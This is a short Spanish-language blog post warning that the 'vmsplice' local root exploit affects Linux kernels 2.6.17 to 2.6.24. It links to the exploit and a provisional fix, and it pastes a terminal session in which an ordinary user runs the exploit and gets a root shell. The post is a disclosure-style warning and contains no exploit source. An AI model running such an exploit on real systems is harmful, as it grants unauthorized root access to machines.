Exploit malpedo
Hoy me encontre con la noticia de que hay un exploit que casi-casi garantiza una cuenta de root en una maquina local, que afecta a los kernel 2.6.17 hasta el 2.6.24.
Aqui esta el codigo del exploit, al parecer le pega a un modulo del kernel que se llama vmsplice, asi que a desactivarlo!! al parecer no hay un fix “oficial”, pero existe uno provicional aqui.
Nomas para que vean que cosa tan espantosa, chequen esto:
nibblesmx@lappy:~$ whoami nibblesmx nibblesmx@lappy:~$ ./exploit ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7da5000 .. 0xb7dd7000 [+] root root@lappy:~# id uid=0(root) gid=0(root) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(scanner),108(lpadmin),110(admin),115(netdev),117(powerdev),1000(nibblesmx) root@lappy:~# whoami root root@lappy:~#
About this entry
You’re currently reading “Exploit malpedo,” an entry on Will Code for Food
- Published:
- 02.11.08 / 10am
- Category:
- General
2 Comments
Jump to comment form | comments rss [?] | trackback uri [?]